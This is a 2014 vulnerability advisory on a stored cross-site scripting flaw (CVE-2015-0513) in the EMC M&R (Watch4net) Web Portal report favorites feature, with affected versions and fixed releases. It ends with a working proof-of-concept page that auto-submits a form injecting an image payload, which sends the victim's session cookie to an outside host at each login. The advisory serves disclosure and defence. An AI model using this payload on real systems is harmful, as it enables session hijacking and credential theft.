------------------------------------------------------------------------
Cross-Site Scripting vulnerability in EMC M&R (Watch4net) Web Portal
Report Favorites
------------------------------------------------------------------------
Han Sahin, November 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in EMC M&R (Watch4net)
Web Portal. This issue allows attackers to replace the report that is
shown at startup, the attackers payload will be stored in the user's
profile and will be executed every time the victim logs in. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, logging their keystrokes, or exploit
issues in other areas of Watch4net.
------------------------------------------------------------------------
Affected products
------------------------------------------------------------------------
EMC reports that the following products are affected by this
vulnerability:
- EMC M&R (Watch4Net) versions prior 6.5u1
- EMC ViPR SRM versions prior to 3.6.1
------------------------------------------------------------------------
See also
------------------------------------------------------------------------
- CVE-2015-0513
- ESA-2015-004: EMC M&R (Watch4Net) Multiple Vulnerabilities
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
EMC released the following updated versions that resolve this
vulnerability:
- EMC M&R (Watch4Net) 6.5u1
- EMC ViPR SRM 3.6.1
Registered customers can download upgraded software from support.emc.com
at https://support.emc.com/downloads/34247_ViPR-SRM.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20141102/cross_site_scripting_vulnerability_in_emc_m_r__watch4net__web_portal_report_favorites.html
This vulnerability exists due to the fact that the description_0 POST parameter is not properly encoded when rendering the selected report. In order to exploit this issue, an attacker must trick a victim into opening a specially crafted web page, for example by send the link via email, posting the link on a (trusted) website or through other means.
This issue allows attackers to replace the report that is shown at startup, the attackers payload will be stored in the user's profile and will be executed every time the victim logs in. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes, or exploit issues in other areas of Watch4net.
The following proof of concept demonstrates this issue. It will use JavaScript to send the session cookie(s) to an attacker controlled website.
<html>
<body>
<form action="http://<target>:58080/APG/form" method="POST">
<input type="hidden" name="form-id" value="FavoriteForm" />
<input type="hidden" name="favorite-count" value="1" />
<input type="hidden" name="ident_0" value="Operations" />
<input type="hidden" name="name_0" value="XSS" />
<input type="hidden" name="description_0" value="?report&select=0-a&display=0&mode=srt&statistics=none&lower=0.0&upper=&type=3&period=3600&durationType=l&duration=1w&itz=Europe%2FBerlin"><img src=x onerror=this.src='https://www.securify.nl/?c='+document.cookie>" />
<input type="hidden" name="home" value="home_0" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>